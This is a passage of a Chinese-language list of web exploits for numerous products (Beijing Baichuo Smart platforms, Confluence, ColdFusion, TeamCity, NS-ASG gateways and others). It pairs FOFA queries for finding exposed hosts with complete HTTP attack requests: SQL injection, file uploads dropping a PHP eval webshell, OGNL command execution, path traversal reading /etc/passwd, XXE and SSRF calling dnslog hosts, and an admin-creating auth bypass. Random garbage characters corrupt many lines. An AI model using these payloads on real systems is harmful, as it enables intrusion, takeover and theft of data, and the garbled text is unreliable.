; }/ u2 S. G$ O3 T" r% ~先登录进入系统,默认账号密码为admin/admin; W, O0 j9 Z* w/ u8 S2 D2 P0 K- [
POST /sysmanage/sysmanageajax.php HTTP/1.11: j9 R- W9 k6 A- s) G
Host: x.x.x.x& A) }) _; d7 A' P3 C! ^
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
* d  p$ t7 w: {% S, WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
% i8 p- N6 m/ l8 k8 M/ l+ @& O& UAccept: */*  T, u8 B8 F8 w" v. W* B5 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( W" W0 m5 v/ X! U: eAccept-Encoding: gzip, deflate8 J9 W( D1 \6 {' s  m9 }
Content-Type: application/x-www-form-urlencoded;+ B/ U+ i) V. D
Content-Length: 109
, n* z4 d5 |) c4 WOrigin: https://58.18.133.60:8443
3 ]/ O( o) u- Y. n, n, M  m5 ZReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
' ~: B1 B7 M2 b; d- X; V, _# d2 gSec-Fetch-Dest: empty
4 i6 {" m+ |2 j, u. sSec-Fetch-Mode: cors
7 y  C/ z) h7 }Sec-Fetch-Site: same-origin2 ]6 J0 m; J4 u) O: b" X. `& L
X-Forwarded-For: 1.1.1.1
& K2 ?7 i" |) P7 r/ Q3 YX-Originating-Ip: 1.1.1.1+ G; c6 U0 q# W5 A! c
X-Remote-Ip: 1.1.1.15 a1 S. M5 T& `( O
X-Remote-Addr: 1.1.1.1
" V3 w* w  \5 R3 Q" W( QTe: trailers  }: j6 `. ^6 u( C* f
Connection: close
/ V5 ?, F; `* e- {
* n% a& p6 s0 r5 G! a# Fsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; ^7 _9 X% q& U! R
. q( N  `( H; H* g5 {* Z# t4 [, x' W
( U- q1 R+ a3 ^1 s1 T7 ?7 F
120. 北京百绰智能S40管理平台导入web.php任意文件上传* I! N8 V+ z) |9 [( I' _
CVE-2024-1253( _! N$ D' K1 ^0 B) x9 X& h
FOFA:title="Smart管理平台"
, E8 M0 b; @, ?) rPOST /useratte/web.php? HTTP/1.1" x9 a( e9 j( T
Host: ip:port
1 e7 f, x6 H/ h5 i& J/ l' jCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 x; G0 k( [+ s; O6 y. P* E
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
' }, y" C$ q9 g: m6 a( z. m* `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 ^, B4 k5 b; O$ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. H; K# l% t, O- A$ P( ^' ^5 Z  MAccept-Encoding: gzip, deflate
) v& v7 [1 w: T; g/ l3 FContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
- M1 }0 _# z, U& y- X$ HContent-Length: 597
) s9 R. L' }$ _; k. }Origin: https://ip:port
+ f, _! O; h0 x2 k  m# x* eReferer: https://ip:port/sysmanage/licence.php. |. o* E" R. p$ L  ?9 o, f9 [
Upgrade-Insecure-Requests: 1
# Q+ Q) c" O% W: X0 cSec-Fetch-Dest: document
( x2 a: ?, h2 |. Y2 CSec-Fetch-Mode: navigate
7 Y* f% r1 p, h) MSec-Fetch-Site: same-origin1 Z* Y$ P' ~% e: M: i4 p
Sec-Fetch-User: ?16 i7 a8 V5 {, S' U
Te: trailers
/ y) }- W+ O8 w. L- h4 s4 MConnection: close
9 Z* ^) J+ S% Y0 v! m' x* `
* M9 W" _; n  ^. e-----------------------------42328904123665875270630079328. |9 T/ D5 g0 g* g, e
Content-Disposition: form-data; name="file_upload"; filename="2.php"
: {! w, y9 Z- n- X8 f: w' S- mContent-Type: application/octet-stream3 @+ g# z# \# Q5 d# ~

0 n& F$ e; q0 T, T<?php phpinfo()?>, j7 O: B4 F) D
-----------------------------42328904123665875270630079328
9 s% x, Y1 ^: t/ W( p1 C! Z  x6 NContent-Disposition: form-data; name="id_type"4 j+ F1 [) v! l. f# }

. x, n* j# E* Q( \4 ^1
* l: m9 {4 c  V- X9 v6 f- o-----------------------------42328904123665875270630079328
# k9 z6 H; C+ B1 b  [1 yContent-Disposition: form-data; name="1_ck"
. x* x* x1 _! |! d6 y$ H# [; i; \3 ~0 I, Q0 ~- @& _
1_radhttp
# D: N: v) F" _3 d+ B1 U) S7 Y8 [-----------------------------42328904123665875270630079328; }! x( O6 i4 n% D6 R% e
Content-Disposition: form-data; name="mode"$ K/ a" Z3 d  F$ ^7 A" b

3 V/ a5 _% t% ?import
$ _! w$ l* B2 V& Z/ [$ |8 j$ B2 o-----------------------------423289041236658752706300793286 }; t" d2 n8 e4 G
; @- S. H5 H& H
% [0 P' x9 |0 ?& W- ^7 v" E
文件路径/upload/2.php
$ f! Y' E5 Y; n+ v: M: D! R' V) d/ `7 L& |! I/ m0 u* e9 Z
121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 M( V* o; s8 }  N6 @5 h$ K
CVE-2024-1918
6 D& d$ K! [/ ^: C& M" r2 sFOFA:title="Smart管理平台"
6 o3 W( z6 w/ V9 @0 MPOST /useratte/userattestation.php HTTP/1.14 e0 @& x7 p9 w. j# {
Host: 192.168.40.130:8443: r5 `  D" o7 i9 C9 T1 p' i5 e
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50" E- ^/ |2 C: s* `( x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko. |9 @! u) e7 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 x0 [5 W$ D& A  v. O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' h1 n, W& e5 |3 r' Z) ^# }
Accept-Encoding: gzip, deflate
1 P3 O* y/ k( _$ h0 G/ uContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328$ B$ J1 q, o+ Z% j6 A) @
Content-Length: 5925 z! l7 f8 w  A, a6 {
Origin: https://192.168.40.130:8443
& ]2 |2 p5 x/ }8 Z" z- Q2 g4 JUpgrade-Insecure-Requests: 1
; o, q) I( {* rSec-Fetch-Dest: document" H# s' T7 a- |$ c7 Z
Sec-Fetch-Mode: navigate
: W2 p9 [7 J5 q7 R0 \Sec-Fetch-Site: same-origin
9 h9 R8 G/ r- [- H. CSec-Fetch-User: ?1
! l' R6 u$ c8 o) qTe: trailers
3 ?! H0 d! q: P: l* J4 qConnection: close
1 L" g! z0 G% q0 I% w, Y+ B# M7 \* b: }8 S: f# k* V5 Q
-----------------------------42328904123665875270630079328, Y1 ~" u! `! ]* |! d6 f6 I
Content-Disposition: form-data; name="web_img"; filename="1.php"
5 b0 p+ |9 e/ ?- Q) Z& _7 h7 u! SContent-Type: application/octet-stream; f/ A3 f* e9 h1 t3 T
" M+ @, x  E' @+ i3 j9 R
<?php phpinfo();?>* Y& p( _8 g! o. G- m  u6 N
-----------------------------42328904123665875270630079328
! N/ K6 J* p+ a' \0 }Content-Disposition: form-data; name="id_type"
! x! A! T7 q, d
, G8 b- s/ k) k' t1
1 w; E4 D4 w& N& b$ b-----------------------------42328904123665875270630079328: `( E9 z8 T, \9 v4 I1 \$ Z
Content-Disposition: form-data; name="1_ck"! |8 Y+ a5 u4 E
; Z2 a3 M0 N) X( Y, I) }
1_radhttp
8 }& e1 j: |  J% @0 Q8 W2 Z-----------------------------42328904123665875270630079328
) b8 Q: j( H9 a+ {$ Q- J( l4 Y# bContent-Disposition: form-data; name="hidwel"
6 Y! H2 o0 F7 `# c1 X
/ j0 |7 {; P: |5 Wset
, u: b4 I% S" \2 c& U-----------------------------42328904123665875270630079328- R9 Q. k7 |4 _8 Q

+ }4 h8 w4 u6 Z- [# b8 ?$ M- [8 v! z& v: c- @8 t8 c
boot/web/upload/weblogo/1.php
8 T9 d8 A2 z8 }7 @% p2 H; e8 D# Y) l
122. 北京百绰智能s200管理平台/importexport.php sql注入$ U8 a* _1 u7 \
CVE-2024-27718FOFA:title="Smart管理平台"" m8 ]) A" ^$ U
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
1 L0 y2 n9 O. @( g8 w: a4 _$ [GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
; Y; x6 ~3 @* m5 w/ oHost: x.x.x.x
; N$ s, S( u3 S2 m* [Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
0 ]" H, ~' a# f4 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 ]# M; ^& `( D5 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) S; }' A; |( \3 w1 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 q1 i9 X8 l3 _+ r  E
Accept-Encoding: gzip, deflate, br
# P8 [0 k3 f/ ^/ h' ^4 RUpgrade-Insecure-Requests: 16 P8 O( i; ]  z$ ~% ~/ @) w
Sec-Fetch-Dest: document
! l' |( v4 \8 A) K8 U( U' SSec-Fetch-Mode: navigate
; c0 I! |! T% z$ m& h. @. RSec-Fetch-Site: none
" Z4 [  Q! `) S' ?* i8 QSec-Fetch-User: ?1
. P7 l1 _6 t" L+ A% t1 pTe: trailers: s8 ]3 |& G$ G3 I" V
Connection: close) k6 G/ L4 u. c, f6 [

3 u8 F7 y1 o4 d8 C
& e4 Y' K4 U( u3 f123. Atlassian Confluence 模板注入代码执行: \- m8 J& `# e9 T8 n' O
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"9 |* u2 a( W8 u2 m, U
POST /template/aui/text-inline.vm HTTP/1.1
( N, i0 o. _" N2 M( y6 ^# ^2 gHost: localhost:8090
" I$ ]0 I# r$ tAccept-Encoding: gzip, deflate, br
6 x+ J% A$ U8 _3 KAccept: */*- d+ D! G& W7 C! D1 b1 H3 Q: z
Accept-Language: en-US;q=0.9,en;q=0.8
+ @' ?+ T4 T! Q  U8 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36- c! w6 s  }4 V! V1 y
Connection: close
0 P+ S+ N2 P& [( C7 H2 q3 G  @3 DContent-Type: application/x-www-form-urlencoded
% U. Q, U0 ]- }+ Q
( i2 F( _% z" `" y: y; mlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))" e' a( ?$ Z  M6 M" s- ?* w4 D9 M
: W9 _5 L" e- N3 N" j/ H% r

8 i8 [+ l' s2 V) Q0 `1 H124. 湖南建研工程质量检测系统任意文件上传
/ j2 |; a* d! zFOFA:body="/Content/Theme/Standard/webSite/login.css"* n$ q/ q9 l# n, O: j" \+ g
POST /Scripts/admintool?type=updatefile HTTP/1.1$ O; j; {" U9 N) k) M! G
Host: 192.168.40.130:8282
" |& N% n( O/ r& k: dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.361 \/ I% ~& O+ @" o2 G5 ]" Z
Content-Length: 72
0 l5 k) l0 `0 V% Q% z6 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.89 V& ]4 |& e6 Y4 a& l- ]4 P1 _
Accept-Encoding: gzip, deflate, br) D; c* L( n3 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* j% J# W( D8 q8 S( A- a
Connection: close/ `  |# p  R: b( [
Content-Type: application/x-www-form-urlencoded
) e8 s# F( P+ V+ N' O$ z/ |8 ~' z
* G4 r, G; I5 c# DfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>; l) z: D( O# v- o1 Q
" B& @0 T+ Y2 I% v/ @8 w: q2 b9 ~

& D9 ^" t5 k, _1 C+ e3 Jhttp://192.168.40.130:8282/Scripts/abcgcg.aspx3 y$ ]1 v- s' k6 n1 v8 ~. K

5 @) p& R! s) d1 q. [0 A5 C! Z125. ConnectWise ScreenConnect身份验证绕过, P3 ^7 P* H+ X& b1 L4 {5 B/ I5 ~
CVE-2024-1709' r2 [- |: ^( K% j1 Q$ x
FOFA:icon_hash="-82958153") V: E# G0 ?. e2 x. A4 r* v
https://github.com/watchtowrlabs ... bypass-add-user-poc( P1 S# N$ c2 M& E8 E* y$ V1 ~" [: ?# y
8 g$ ?* J  q) }0 U
  k  F' k7 H3 I. t
使用方法
0 z# s2 j* w; u: jpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!/ a2 @, r9 h* e+ X# a% d
5 n& i. U- o' y0 A! c3 {) b

9 R9 L" K4 }% k/ X; T( X& \创建好用户后直接登录后台,可以执行系统命令。/ J8 p7 i- A+ H$ p+ ]/ U

- |  y. u. [: r$ _7 O126. Aiohttp 路径遍历
* N8 X' h$ _4 s( V) I. X7 oFOFA:title=="ComfyUI"
; f' f# Q( I4 T' E+ {- ~& @GET /static/../../../../../etc/passwd HTTP/1.12 L) ^, K! P3 L. A
Host: x.x.x.x
( `; q4 ?7 N3 S7 i  a  U& zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ s  p5 c- `, c* @" m. \Connection: close
/ @  l+ H. }, sAccept: */*
2 V5 O2 t+ X$ s7 l- cAccept-Language: en2 B  g, `+ ?$ a4 I
Accept-Encoding: gzip
0 D! T5 i# ?" R6 P# p( `
" l+ V8 X( l. i) {. w% a6 @( s" l; X/ _3 U5 f
127. 广联达Linkworks DataExchange.ashx XXE$ H% t% T& a4 x, f! W2 l; t
FOFA:body="Services/Identification/login.ashx"
- ^8 Z, ^/ Q) L) v- Z" ]1 i+ u$ IPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
9 j7 }4 ]- Y# ^/ o, M8 r5 X- c4 b  bHost: 192.168.40.130:8888
& y7 g  e4 n7 E  ]/ t5 w  P! UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36) K: z0 {3 ]7 W( {& K
Content-Length: 4158 _) A; J. S- r! S( {: ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( f# Z. U- I  }$ |Accept-Encoding: gzip, deflate& l8 b+ f3 e9 p2 ?
Accept-Language: zh-CN,zh;q=0.9- O( h5 ^3 A5 {. |9 B
Connection: close
  r% z' z& B( B. y) x8 b7 Y  F( rContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
7 p: s2 |! j4 C8 K' y! q' [9 xPurpose: prefetch8 I8 i* a7 o. W; C* \
Sec-Purpose: prefetch;prerender
0 n1 J8 z+ z" g! I$ ]3 h8 D4 W
  P/ l7 D" v7 A/ z* T+ l------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 ]3 \$ A3 s, }& L, oContent-Disposition: form-data;name="SystemName"6 e+ Z/ S- U' H7 I3 o6 M! Q
9 A3 w! s% ~9 Z/ V8 F9 |
BIM* ^5 P" P% L2 Y* O% H$ P/ o, h5 C
------WebKitFormBoundaryJGgV5l5ta05yAIe0
, F7 x. s( f$ H8 t5 t% vContent-Disposition: form-data;name="Params"9 H$ X/ `3 ?  j9 ~& {$ X, _
Content-Type: text/plain. ?( `; j$ u; V  {- N5 M

/ S2 }( b8 R# d- h; J8 a# E& s<?xml version="1.0" encoding="UTF-8"?>
2 W9 s: ?8 {- M; C1 b<!DOCTYPE test [4 Y: ?# v! X% K: E& W2 S- ?/ d
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">9 r- V* }+ e% o7 e6 f1 \  m+ _+ D9 S
]( q% v- P; W4 S  I# X$ Y" L: |# B
>7 w* b% h" C% [5 n' m
<test>&t;</test>; P! h3 i1 K9 D; f7 u
------WebKitFormBoundaryJGgV5l5ta05yAIe0--) h5 N# k6 n9 d1 @" x- R
9 m9 H$ P! Z/ f) s+ ~

& s$ P8 ]- {' k$ k; d, D/ n
, D+ I+ `# y% q128. Adobe ColdFusion 反序列化, b) T. x' `9 A8 Z, o! K! l
CVE-2023-38203  [$ e3 b6 S5 k5 C& v
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
7 _+ a) N, x% `FOFA:app="Adobe-ColdFusion"( T8 b1 H8 h) d0 N8 k
PAYLOAD5 f3 B* Q$ W( Z
$ S9 V$ |! i4 Y1 \$ t/ j9 N0 t2 _
129. Adobe ColdFusion 任意文件读取) a( o& g& h% _  G  M) }: u
CVE-2024-207677 K+ B% I8 I& w# Y  Y
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
' T; I( M( z) w9 C, B第一步,获取uuid) \  P" }! l6 @6 q9 _
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
0 o" g4 B! v" r, I: V* q7 L. ?Host: x.x.x.x
, W9 }$ @& Q/ ^( l5 ]: dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 U, }* _& q) R4 a7 j" ~Accept: */*
# T9 ?" N. X( G/ ~0 I$ d) X; T. V1 TAccept-Encoding: gzip, deflate
" M( b4 {+ T  @( D, e& I4 V4 i+ LConnection: close2 @/ C6 X+ w7 v% O, M

- K1 l2 S3 \! N, f; k- I1 h# [9 Z3 X* C; Y% D0 S
第二步,读取/etc/passwd文件
* f- l! \  K% L7 |4 q- x2 a6 @GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.15 A0 a8 a) J: x6 D2 m9 m! F& H# U
Host: x.x.x.x
- K: N, y! ^" B0 L: [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: Y$ B: t" {+ m7 bAccept: */*
( e% [/ z; {  n! |1 M( YAccept-Encoding: gzip, deflate3 j6 M5 @  ~( Z. G8 v" ~4 e' y5 Y: ^
Connection: close8 u/ U0 L8 E4 S2 x! N- O4 v3 E
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
7 q  `- D" s: N3 O/ N% L: o
( \9 _$ l2 W; L& M) J7 Z- j" \; N6 o' ?2 y, E+ s2 l
130. Laykefu客服系统任意文件上传( {* u* L+ t( h* F$ R: _+ T! H
FOFA:icon_hash="-334624619"9 G1 W% G+ W+ S8 J7 n
POST /admin/users/upavatar.html HTTP/1.1
5 N- R. B& ^- JHost: 127.0.0.1
- v# Q2 _$ s" K# z2 XAccept: application/json, text/javascript, */*; q=0.01# z. s" D% {! {! p% n9 _/ M
X-Requested-With: XMLHttpRequest
0 H6 d/ i# M, {+ e7 Z- Z' t+ JUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26' V" c3 P; T  k# ~3 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR5 J+ P! ~2 Y# p9 v( }& N. j3 o  U& x; F
Accept-Encoding: gzip, deflate
: \# d5 J7 `  f! ?% e$ \Accept-Language: zh-CN,zh;q=0.9
" S) A8 B  j  M$ A9 j$ }Cookie: user_name=1; user_id=3# L/ g( R/ n7 ^) T+ ?' h) u
Connection: close3 y$ ^$ T. h4 A& ~: X
& p! c  Z( V4 Q
------WebKitFormBoundary3OCVBiwBVsNuB2kR
- `# b0 C: k# PContent-Disposition: form-data; name="file"; filename="1.php"' I$ \; v1 K1 p; M/ h( L+ u! B5 ?
Content-Type: image/png
! _5 q, I# P% |* f; n3 q
; b3 u8 u6 G( J: r& c<?php phpinfo();@eval($_POST['sec']);?>6 ^$ `7 w/ F- `7 Y3 \+ e
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
* g* t3 g$ K9 |' D& F
; k& f8 N; {6 G- g8 @
# `  f' m- O; ~1 w- W7 U131. Mini-Tmall <=20231017 SQL注入1 H9 ?/ ]  u, O4 \2 q
FOFA:icon_hash="-2087517259"2 h" _* O; u; b4 ~
后台地址:http://localhost:8080/tmall/admin
9 ?/ J; ~3 k' k3 P* ~8 e1 u0 Y9 @" mhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
8 ?1 l* N+ U0 V4 F
7 e8 ?' |; P  O- a1 V  g132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 l# y" }- n" L4 M% ^+ G' j. hCVE-2024-271984 p- Q% o( Y4 T, a" x
FOFA:body="Log in to TeamCity"
9 N  Y8 e" O6 S3 F! FPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 B* t, }, w1 x; {- x3 d% h! aHost: 192.168.40.130:8111% N$ w! A$ N+ |! d2 C4 O" W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, d/ [4 n' S- r; V3 W
Accept: */*% k8 \% G5 @3 {% d* \4 }" L7 l( x
Content-Type: application/json0 {" B9 J& S- ?+ J$ C
Accept-Encoding: gzip, deflate
3 a3 {4 d) ?0 [2 H& m4 \$ V1 Y' m8 z2 m! \6 C2 Q& @- i$ P/ d5 J
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}! F8 T  \3 }) d7 F9 H2 x- {
' y" R8 m7 q5 W/ B1 V+ f8 k
' W+ Y5 P" e: @0 h/ T7 ^1 {$ _
CVE-2024-271990 p* h( U5 X: _0 F4 `
/res/../admin/diagnostic.jsp0 e- L8 K7 l# u6 Y/ x0 ]. Z; I
/.well-known/acme-challenge/../../admin/diagnostic.jsp" _" v- `( t4 f
/update/../admin/diagnostic.jsp$ ^% Q4 L7 z+ T; g$ c1 D$ h6 o
: K% L% d, b" B

: q. w% X$ \6 F& g7 S, M1 B" A5 hCVE-2024-27198-RCE.py# N! {  U) z, d& A+ P# e
& j# \: s9 v* n  R, K  F7 N, ]2 k7 p2 k
133. H5 云商城 file.php 文件上传1 \0 k, o* g6 Z3 I  R2 G
FOFA:body="/public/qbsp.php") _, p; k% y8 F& E" G
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
1 K# n; N: r2 J5 e. I5 \5 QHost: your-ip
! B4 ~6 n1 ~+ E. d) QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ u! e1 X; `3 \* jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 a: }2 n, t$ a4 K4 L
: p  z* q& O, b5 K8 f# I------WebKitFormBoundaryFQqYtrIWb8iBxUCx
$ U) o. w7 D. `" n% zContent-Disposition: form-data; name="file"; filename="rce.php"
. r4 f4 N2 ?. l; M( Q! T: \Content-Type: application/octet-stream% e% d8 m1 ?8 Z
; `( \! \: y. b, V" b3 @
<?php system("cat /etc/passwd");unlink(__FILE__);?>
# p( m& g% ]% V- a; V; F/ t------WebKitFormBoundaryFQqYtrIWb8iBxUCx--  j+ u3 G: m/ q2 u; P7 m
; h" }, k9 L  v* E* f5 X+ s* W
4 v5 p$ G9 A6 x5 v9 ?
3 H4 i! x- v! X) H
134. 网康NS-ASG应用安全网关index.php sql注入5 m- C3 {5 z- O) p, ]  t+ D2 D, ^7 [
CVE-2024-23309 ]+ D0 R3 B  ^
Netentsec NS-ASG Application Security Gateway 6.3版本: x) f/ D; K3 E5 N0 K; v
FOFA:app="网康科技-NS-ASG安全网关"
6 D: o9 [+ z$ S4 W" B2 ?POST /protocol/index.php HTTP/1.1: ]5 u, A- h! `' M: j
Host: x.x.x.x. Y( {6 l8 J/ o7 t5 q
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
2 I) G5 k) [4 m) YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.04 V: z( v3 p# O
Accept: */*( G) ]: q6 I/ ^7 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 A, a3 `4 V- Z% K8 w1 |Accept-Encoding: gzip, deflate
& v$ _* \& R4 @+ b; i3 G/ j- @Sec-Fetch-Dest: empty
# s1 g% E# f7 W  |$ ]3 f) T1 HSec-Fetch-Mode: cors4 Z, w; P  S' R- L( v" I
Sec-Fetch-Site: same-origin
1 u; S$ o1 X2 ?* U4 WTe: trailers
* `! _$ z0 Z& E& p2 H1 jConnection: close: a! ?# V3 f8 A9 P1 F0 s$ \
Content-Type: application/x-www-form-urlencoded
/ K0 y/ ]7 m; j0 ^2 j  TContent-Length: 263
0 C! C% W" U) R6 `- i2 h! C) p" m% R- P- S
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
7 |% w9 X$ ^% Y- w
  S% h% i6 a7 N$ }* Y+ e7 F, n* M8 Q. I0 d& n4 q
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入% J0 }2 h0 [9 K) ^" z* ?8 a
CVE-2024-20226 o# I! D0 V8 x  w7 H
Netentsec NS-ASG Application Security Gateway 6.3版本4 v+ ?$ s# Q% X1 K! I! @+ _4 d
FOFA:app="网康科技-NS-ASG安全网关"7 Y; z) [4 r+ X" D" G
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
' n7 V$ u* a: y0 cHost: x.x.x.x
% Q' y% }" Q& w2 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! A* F" d* k9 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 K! u, n. W2 o1 x- N7 j; H7 _# KAccept-Encoding: gzip, deflate
' o2 R" e% g. |2 {Accept-Language: zh-CN,zh;q=0.9
4 Z. z0 ^: e9 F4 S, O+ K* WConnection: close5 }  F4 N+ N$ q7 J) I( g5 ~

2 z; ]) p" V" r/ X) _9 r6 k0 {! R, d4 L
136. NextChat cors SSRF
+ G) b& d7 W" i8 r; z! e4 kCVE-2023-49785
$ p, c0 i& `7 WFOFA:title="NextChat"
0 L9 o0 r. x9 N/ V* ]& \GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.17 g8 j" c& Q7 w6 q; u. ^6 ^
Host: x.x.x.x:100001 ^" J- v, {1 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; u- J2 D1 W/ x& X# t. L" M- SConnection: close
( T4 C" l! T2 c- T' _/ ^Accept: */*/ ?2 `$ t! \* ^5 P' N$ q% {
Accept-Language: en7 W3 V: v% F) b! J5 w" R1 ^
Accept-Encoding: gzip/ ]! T3 s! i$ m

) _  m' [& ?( M5 a' s: @. C5 S- }0 V9 c' B& p' {5 ~8 S. f
137. 福建科立迅通信指挥调度平台down_file.php sql注入2 P0 l- \: v" I
CVE-2024-26204 S4 @& [! \8 Q; Y/ s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ S) F' l6 Y. X# Z0 E' N
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
* W3 G7 p9 u' z9 ~6 eHost: x.x.x.x
) m; R5 [% y+ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) J. E; M) Y/ c' Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- ~2 \  v, W3 G8 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# u/ a# W$ r) U, `8 _# LAccept-Encoding: gzip, deflate, br
